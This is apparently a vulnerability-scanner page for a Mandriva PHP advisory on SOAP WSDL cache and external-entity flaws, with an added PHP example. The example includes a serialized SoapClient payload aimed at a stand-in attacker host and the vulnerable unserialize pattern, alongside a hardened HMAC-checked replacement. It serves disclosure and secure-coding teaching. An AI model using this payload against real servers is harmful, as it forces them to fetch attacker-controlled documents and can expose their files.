Mandriva Linux Security Advisory : php (MDVSA-2013:016)
High Nessus Plugin ID 64942
Synopsis
The remote Mandriva Linux host is missing one or more security updates.
Description
Multiple vulnerabilities have been discovered and corrected in php:
PHP does not validate the configuration directive soap.wsdl_cache_dir before writing SOAP WSDL cache files to the filesystem. As a result, an attacker is able to have remote WSDL files written to arbitrary locations on the filesystem (CVE-2013-1635).
PHP allows the use of external entities while parsing SOAP WSDL files, which allows an attacker to read arbitrary files. If a web application unserializes user-supplied data and then calls any method on the resulting object, an attacker can send a serialized SoapClient object initialized in non-WSDL mode, which makes PHP automatically fetch and parse the remote XML document specified in the location option (CVE-2013-1643).
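The two issues above, illustrated with an added example that is not code from the advisory, Nessus, Mandriva or the PHP project: it shows the serialized SoapClient payload the description refers to, the unserialize-then-call pattern that makes it dangerous, a hardened replacement written against the PHP 5.3 API (so no hash_equals() or allowed_classes), and a small report of the SOAP cache directives and PHP version that the advisory's fix concerns. The attacker host, the HMAC key and the Profile class are illustrative assumptions.

```php
<?php
// Added example for this advisory page; not code from Mandriva, Nessus or the
// PHP project. Written for the PHP 5.3 API (no hash_equals(), no allowed_classes).
// Hostname, key and class names below are illustrative assumptions.

// --- CVE-2013-1643: what the attacker's payload looks like --------------------
// A SoapClient built in non-WSDL mode (first argument null) needs only the
// 'location' and 'uri' options. Constructing it makes no network request, but
// once the object is unserialized on the victim and ANY method is called on it,
// SoapClient::__call() sends a SOAP request to 'location' and parses the XML
// reply, so the attacker picks which remote document the server fetches and
// parses. Requires ext/soap to be loaded.
function attacker_payload()
{
    $client = new SoapClient(null, array(
        'location' => 'http://attacker.example/evil',   // assumed attacker host
        'uri'      => 'urn:anything',
    ));
    return serialize($client);
}

// --- Vulnerable pattern named by the advisory ---------------------------------
// Untrusted bytes go straight into unserialize() and a method is invoked on
// whatever object comes back. With the payload above, getName() becomes a
// remote SOAP call. Defined for illustration; never called here on purpose.
function restore_profile_unsafe($cookie)
{
    $obj = unserialize($cookie);    // attacker chooses the class and its properties
    return $obj->getName();         // SoapClient::__call() fires an outbound request
}

// --- Hardened pattern ---------------------------------------------------------
// Never unserialize() untrusted input. Carry scalars only, as JSON, under an
// HMAC so tampering is rejected before anything is decoded; rebuild the object
// from a known class server-side.
class Profile
{
    public $name;
    public function __construct($name) { $this->name = (string) $name; }
    public function getName() { return $this->name; }
}

function constant_time_equals($a, $b)
{
    if (strlen($a) !== strlen($b)) {
        return false;
    }
    $diff = 0;
    for ($i = 0, $n = strlen($a); $i < $n; $i++) {
        $diff |= ord($a[$i]) ^ ord($b[$i]);
    }
    return $diff === 0;
}

function issue_profile_cookie(Profile $p, $key)
{
    $payload = base64_encode(json_encode(array('name' => $p->getName())));
    return $payload . '.' . hash_hmac('sha256', $payload, $key);
}

function restore_profile_safe($cookie, $key)
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    list($payload, $sig) = $parts;
    if (!constant_time_equals(hash_hmac('sha256', $payload, $key), $sig)) {
        return null;                                        // forged or tampered
    }
    $data = json_decode(base64_decode($payload), true);     // arrays only, never objects
    if (!is_array($data) || !isset($data['name'])) {
        return null;
    }
    return new Profile($data['name']);
}

// --- Checks relevant to both CVEs ---------------------------------------------
// CVE-2013-1635 concerns where SOAP writes WSDL cache files; report the
// effective settings together with whether the running PHP is at or past the
// fixed version named in the advisory.
function soap_exposure_report()
{
    return array(
        'php_version'             => PHP_VERSION,
        'at_or_past_5_3_22'       => version_compare(PHP_VERSION, '5.3.22', '>='),
        'soap_loaded'             => extension_loaded('soap'),
        'soap.wsdl_cache_enabled' => ini_get('soap.wsdl_cache_enabled'),
        'soap.wsdl_cache_dir'     => ini_get('soap.wsdl_cache_dir'),
    );
}

$key    = 'replace-with-a-random-secret';   // assumed server-side key
$cookie = issue_profile_cookie(new Profile('alice'), $key);
var_dump(restore_profile_safe($cookie, $key)->getName());
var_dump(restore_profile_safe(attacker_payload(), $key));   // rejected at the HMAC check, never unserialized
print_r(soap_exposure_report());
```

Run it with the php CLI on a host that has ext/soap loaded. The serialized SoapClient is only built and fed to the hardened path, which drops it before any decoding; restore_profile_unsafe() is shown for contrast and is deliberately never invoked with that payload, since doing so would make the interpreter contact the location host. Note that the JSON-plus-HMAC envelope removes the unserialize() sink entirely; it is a mitigation for the application pattern, not a substitute for upgrading PHP, because the WSDL-cache and external-entity issues are in the SOAP extension itself.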
The updated packages have been upgraded to version 5.3.22, which is not vulnerable to these issues.
Additionally, some packages that depend on php have been rebuilt against php-5.3.22.
Solution
Update the affected packages.